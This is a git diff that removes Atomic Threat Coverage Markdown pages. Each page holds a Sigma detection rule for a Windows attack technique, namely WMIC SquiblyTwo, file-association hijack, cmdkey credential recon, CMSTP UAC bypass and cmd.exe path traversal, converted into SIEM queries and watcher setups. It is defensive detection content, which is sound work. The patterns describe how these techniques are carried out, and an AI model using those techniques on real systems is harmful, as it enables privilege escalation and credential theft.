-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "Image.*.*\\wmic.exe") -and ($_.message -match "CommandLine.*wmic .* .*format:\\\"http.*" -or $_.message -match "CommandLine.*wmic .* /format:'http" -or $_.message -match "CommandLine.*wmic .* /format:http.*")) -or (($_.message -match "1B1A3F43BF37B5BFE60751F2EE2F326E" -or $_.message -match "37777A96245A3C74EB217308F3546F4C" -or $_.message -match "9D87C9D67CE724033C0B40CC4CA1B206") -and ($_.message -match "CommandLine.*.* .*format:\\\"http.*" -or $_.message -match "CommandLine.*.* /format:'http" -or $_.message -match "CommandLine.*.* /format:http.*")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\wmic.exe) AND winlog.event_data.CommandLine.keyword:(wmic\ *\ *format\:\\\"http* OR wmic\ *\ \/format\:'http OR wmic\ *\ \/format\:http*)) OR (winlog.event_data.Imphash:("1b1a3f43bf37b5bfe60751f2ee2f326e" OR "1B1A3F43BF37B5BFE60751F2EE2F326E" OR "37777a96245a3c74eb217308f3546f4c" OR "37777A96245A3C74EB217308F3546F4C" OR "9d87c9d67ce724033c0b40cc4ca1b206" OR "9D87C9D67CE724033C0B40CC4CA1B206") AND winlog.event_data.CommandLine.keyword:(*\ *format\:\\\"http* OR *\ \/format\:'http OR *\ \/format\:http*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8d63dadf-b91b-4187-87b6-34a1114577ea <<EOF
-{
-  "metadata": {
-    "title": "SquiblyTwo",
-    "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1047"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\wmic.exe) AND winlog.event_data.CommandLine.keyword:(wmic\\ *\\ *format\\:\\\\\\\"http* OR wmic\\ *\\ \\/format\\:'http OR wmic\\ *\\ \\/format\\:http*)) OR (winlog.event_data.Imphash:(\"1b1a3f43bf37b5bfe60751f2ee2f326e\" OR \"1B1A3F43BF37B5BFE60751F2EE2F326E\" OR \"37777a96245a3c74eb217308f3546f4c\" OR \"37777A96245A3C74EB217308F3546F4C\" OR \"9d87c9d67ce724033c0b40cc4ca1b206\" OR \"9D87C9D67CE724033C0B40CC4CA1B206\") AND winlog.event_data.CommandLine.keyword:(*\\ *format\\:\\\\\\\"http* OR *\\ \\/format\\:'http OR *\\ \\/format\\:http*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\wmic.exe) AND winlog.event_data.CommandLine.keyword:(wmic\\ *\\ *format\\:\\\\\\\"http* OR wmic\\ *\\ \\/format\\:'http OR wmic\\ *\\ \\/format\\:http*)) OR (winlog.event_data.Imphash:(\"1b1a3f43bf37b5bfe60751f2ee2f326e\" OR \"1B1A3F43BF37B5BFE60751F2EE2F326E\" OR \"37777a96245a3c74eb217308f3546f4c\" OR \"37777A96245A3C74EB217308F3546F4C\" OR \"9d87c9d67ce724033c0b40cc4ca1b206\" OR \"9D87C9D67CE724033C0B40CC4CA1B206\") AND winlog.event_data.CommandLine.keyword:(*\\ *format\\:\\\\\\\"http* OR *\\ \\/format\\:'http OR *\\ \\/format\\:http*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SquiblyTwo'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\wmic.exe) AND CommandLine.keyword:(wmic * *format\:\\\"http* wmic * \/format\:'http wmic * \/format\:http*)) OR (Imphash:("1b1a3f43bf37b5bfe60751f2ee2f326e" "1B1A3F43BF37B5BFE60751F2EE2F326E" "37777a96245a3c74eb217308f3546f4c" "37777A96245A3C74EB217308F3546F4C" "9d87c9d67ce724033c0b40cc4ca1b206" "9D87C9D67CE724033C0B40CC4CA1B206") AND CommandLine.keyword:(* *format\:\\\"http* * \/format\:'http * \/format\:http*)))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\wmic.exe") (CommandLine="wmic * *format:\\\"http*" OR CommandLine="wmic * /format:'http" OR CommandLine="wmic * /format:http*")) OR ((Imphash="1B1A3F43BF37B5BFE60751F2EE2F326E" OR Imphash="37777A96245A3C74EB217308F3546F4C" OR Imphash="9D87C9D67CE724033C0B40CC4CA1B206") (CommandLine="* *format:\\\"http*" OR CommandLine="* /format:'http" OR CommandLine="* /format:http*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image IN ["*\\wmic.exe"] CommandLine IN ["wmic * *format:\\\"http*", "wmic * /format:'http", "wmic * /format:http*"]) OR (Imphash IN ["1B1A3F43BF37B5BFE60751F2EE2F326E", "37777A96245A3C74EB217308F3546F4C", "9D87C9D67CE724033C0B40CC4CA1B206"] CommandLine IN ["* *format:\\\"http*", "* /format:'http", "* /format:http*"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*\wmic\.exe))(?=.*(?:.*wmic .* .*format:\"http.*|.*wmic .* /format:'"'"'http|.*wmic .* /format:http.*)))|.*(?:.*(?=.*(?:.*1B1A3F43BF37B5BFE60751F2EE2F326E|.*37777A96245A3C74EB217308F3546F4C|.*9D87C9D67CE724033C0B40CC4CA1B206))(?=.*(?:.*.* .*format:\"http.*|.*.* /format:'"'"'http|.*.* /format:http.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_change_default_file_association.md b/Atomic_Threat_Coverage/Detection_Rules/win_change_default_file_association.md
deleted file mode 100644
index 7ce67ca..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_change_default_file_association.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Change Default File Association       |
-|:-------------------------|:------------------|
-| **Description**          | When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1042: Change Default File Association](https://attack.mitre.org/techniques/T1042)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Admin activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, oscd.community |
-| Other Tags           | <ul><li>attack.t1546.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Change Default File Association
-id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061
-status: experimental
-description: When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-author: Timur Zinniatullin, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all:
-            - 'cmd'
-            - '/c'
-            - 'assoc'
-    condition: selection
-falsepositives:
-    - Admin activity
-fields:
-    - Image
-    - CommandLine
-    - User
-    - LogonGuid
-    - Hashes
-    - ParentProcessGuid
-    - ParentCommandLine
-level: low
-tags:
-    - attack.persistence
-    - attack.t1042
-    - attack.t1546.001
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*cmd.*" -and $_.message -match "CommandLine.*.*/c.*" -and $_.message -match "CommandLine.*.*assoc.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*cmd* AND winlog.event_data.CommandLine.keyword:*\/c* AND winlog.event_data.CommandLine.keyword:*assoc*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3d3aa6cd-6272-44d6-8afc-7e88dfef7061 <<EOF
-{
-  "metadata": {
-    "title": "Change Default File Association",
-    "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1042",
-      "attack.t1546.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*cmd* AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*assoc*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*cmd* AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*assoc*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Change Default File Association'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\n             User = {{_source.User}}\n        LogonGuid = {{_source.LogonGuid}}\n           Hashes = {{_source.Hashes}}\nParentProcessGuid = {{_source.ParentProcessGuid}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*cmd* AND CommandLine.keyword:*\/c* AND CommandLine.keyword:*assoc*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*cmd*" CommandLine="*/c*" CommandLine="*assoc*") | table Image,CommandLine,User,LogonGuid,Hashes,ParentProcessGuid,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*cmd*" CommandLine="*/c*" CommandLine="*assoc*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*cmd.*)(?=.*.*/c.*)(?=.*.*assoc.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_cmdkey_recon.md b/Atomic_Threat_Coverage/Detection_Rules/win_cmdkey_recon.md
deleted file mode 100644
index c06168a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_cmdkey_recon.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Cmdkey Cached Credentials Recon       |
-|:-------------------------|:------------------|
-| **Description**          | Detects usage of cmdkey to look for cached credentials |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrative tasks.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation](https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation)</li><li>[https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx](https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx)</li></ul>  |
-| **Author**               | jmallette |
-| Other Tags           | <ul><li>attack.t1003.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Cmdkey Cached Credentials Recon
-id: 07f8bdc2-c9b3-472a-9817-5a670b872f53
-status: experimental
-description: Detects usage of cmdkey to look for cached credentials
-references:
-    - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
-    - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx
-author: jmallette
-date: 2019/01/16
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\cmdkey.exe'
-        CommandLine: '* /list *'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-    - User
-falsepositives:
-    - Legitimate administrative tasks.
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\cmdkey.exe" -and $_.message -match "CommandLine.*.* /list .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\cmdkey.exe AND winlog.event_data.CommandLine.keyword:*\ \/list\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/07f8bdc2-c9b3-472a-9817-5a670b872f53 <<EOF
-{
-  "metadata": {
-    "title": "Cmdkey Cached Credentials Recon",
-    "description": "Detects usage of cmdkey to look for cached credentials",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.005"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\cmdkey.exe AND winlog.event_data.CommandLine.keyword:*\\ \\/list\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\cmdkey.exe AND winlog.event_data.CommandLine.keyword:*\\ \\/list\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Cmdkey Cached Credentials Recon'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n             User = {{_source.User}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\cmdkey.exe AND CommandLine.keyword:* \/list *)
-```
-
-
-### splunk
-    
-```
-(Image="*\\cmdkey.exe" CommandLine="* /list *") | table CommandLine,ParentCommandLine,User
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\cmdkey.exe" CommandLine="* /list *")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\cmdkey\.exe)(?=.*.* /list .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_cmstp_com_object_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_cmstp_com_object_access.md
deleted file mode 100644
index 977b54e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_cmstp_com_object_access.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | CMSTP UAC Bypass via COM Object Access       |
-|:-------------------------|:------------------|
-| **Description**          | Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1088: Bypass User Account Control](https://attack.mitre.org/techniques/T1088)</li><li>[T1191: CMSTP](https://attack.mitre.org/techniques/T1191)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate CMSTP use (unlikely in modern enterprise environments)</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/](https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/)</li><li>[https://twitter.com/hFireF0X/status/897640081053364225](https://twitter.com/hFireF0X/status/897640081053364225)</li></ul>  |
-| **Author**               | Nik Seetharaman |
-| Other Tags           | <ul><li>attack.g0069</li><li>car.2019-04-001</li><li>attack.t1548.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CMSTP UAC Bypass via COM Object Access
-id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253
-status: stable
-description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects
-tags:
-    - attack.defense_evasion
-    - attack.privilege_escalation
-    - attack.execution
-    - attack.t1088
-    - attack.t1191
-    - attack.g0069
-    - car.2019-04-001
-    - attack.t1548.002
-    - attack.t1218
-author: Nik Seetharaman
-modified: 2019/07/31
-date: 2019/01/16
-references:
-    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
-    - https://twitter.com/hFireF0X/status/897640081053364225
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        ParentCommandLine|contains: '\DllHost.exe '
-    selection2:
-        ParentCommandLine|endswith:
-            - '{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
-            - '{3E000D72-A845-4CD9-BD83-80C07C3B881F}'
-    condition: selection1 and selection2
-fields:
-    - CommandLine
-    - ParentCommandLine
-    - Hashes
-falsepositives:
-    - Legitimate CMSTP use (unlikely in modern enterprise environments)
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentCommandLine.*.*\\DllHost.exe .*" -and ($_.message -match "ParentCommandLine.*.*{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" -or $_.message -match "ParentCommandLine.*.*{3E000D72-A845-4CD9-BD83-80C07C3B881F}")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentCommandLine.keyword:*\\DllHost.exe\ * AND winlog.event_data.ParentCommandLine.keyword:(*\{3E5FC7F9\-9A51\-4367\-9063\-A120244FBEC7\} OR *\{3E000D72\-A845\-4CD9\-BD83\-80C07C3B881F\}))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4b60e6f2-bf39-47b4-b4ea-398e33cfe253 <<EOF
-{
-  "metadata": {
-    "title": "CMSTP UAC Bypass via COM Object Access",
-    "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.privilege_escalation",
-      "attack.execution",
-      "attack.t1088",
-      "attack.t1191",
-      "attack.g0069",
-      "car.2019-04-001",
-      "attack.t1548.002",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.ParentCommandLine.keyword:*\\\\DllHost.exe\\ * AND winlog.event_data.ParentCommandLine.keyword:(*\\{3E5FC7F9\\-9A51\\-4367\\-9063\\-A120244FBEC7\\} OR *\\{3E000D72\\-A845\\-4CD9\\-BD83\\-80C07C3B881F\\}))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentCommandLine.keyword:*\\\\DllHost.exe\\ * AND winlog.event_data.ParentCommandLine.keyword:(*\\{3E5FC7F9\\-9A51\\-4367\\-9063\\-A120244FBEC7\\} OR *\\{3E000D72\\-A845\\-4CD9\\-BD83\\-80C07C3B881F\\}))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CMSTP UAC Bypass via COM Object Access'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n           Hashes = {{_source.Hashes}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentCommandLine.keyword:*\\DllHost.exe * AND ParentCommandLine.keyword:(*\{3E5FC7F9\-9A51\-4367\-9063\-A120244FBEC7\} *\{3E000D72\-A845\-4CD9\-BD83\-80C07C3B881F\}))
-```
-
-
-### splunk
-    
-```
-(ParentCommandLine="*\\DllHost.exe *" (ParentCommandLine="*{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" OR ParentCommandLine="*{3E000D72-A845-4CD9-BD83-80C07C3B881F}")) | table CommandLine,ParentCommandLine,Hashes
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentCommandLine="*\\DllHost.exe *" ParentCommandLine IN ["*{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", "*{3E000D72-A845-4CD9-BD83-80C07C3B881F}"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\DllHost\.exe .*)(?=.*(?:.*.*\{3E5FC7F9-9A51-4367-9063-A120244FBEC7\}|.*.*\{3E000D72-A845-4CD9-BD83-80C07C3B881F\})))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_commandline_path_traversal.md b/Atomic_Threat_Coverage/Detection_Rules/win_commandline_path_traversal.md
deleted file mode 100644
index 9af66c4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_commandline_path_traversal.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Cmd.exe CommandLine Path Traversal       |
-|:-------------------------|:------------------|
-| **Description**          | detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>(not much) some benign Java tools may product false-positive commandlines for loading libraries</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/](https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/)</li><li>[https://twitter.com/Oddvarmoe/status/1270633613449723905](https://twitter.com/Oddvarmoe/status/1270633613449723905)</li></ul>  |
-| **Author**               | xknow @xknow_infosec |
-| Other Tags           | <ul><li>attack.t1059.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Cmd.exe CommandLine Path Traversal
-id: 087790e3-3287-436c-bccf-cbd0184a7db1
-description: detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking
-status: experimental
-date: 2020/06/11
-author: xknow @xknow_infosec
-references:
-    - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/
-    - https://twitter.com/Oddvarmoe/status/1270633613449723905
-tags:
-    - attack.t1059
-    - attack.t1059.003
-    - attack.execution
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentCommandLine|contains: 'cmd*/c'
-        CommandLine|contains: '/../../'
-    condition: selection
-falsepositives:
-    - (not much) some benign Java tools may product false-positive commandlines for loading libraries
-level: high
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentCommandLine.*.*cmd.*/c.*" -and $_.message -match "CommandLine.*.*/../../.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentCommandLine.keyword:*cmd*\/c* AND winlog.event_data.CommandLine.keyword:*\/..\/..\/*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/087790e3-3287-436c-bccf-cbd0184a7db1 <<EOF
-{
-  "metadata": {
-    "title": "Cmd.exe CommandLine Path Traversal",
-    "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking",
-    "tags": [
-      "attack.t1059",
-      "attack.t1059.003",
-      "attack.execution"
-    ],
-    "query": "(winlog.event_data.ParentCommandLine.keyword:*cmd*\\/c* AND winlog.event_data.CommandLine.keyword:*\\/..\\/..\\/*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentCommandLine.keyword:*cmd*\\/c* AND winlog.event_data.CommandLine.keyword:*\\/..\\/..\\/*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
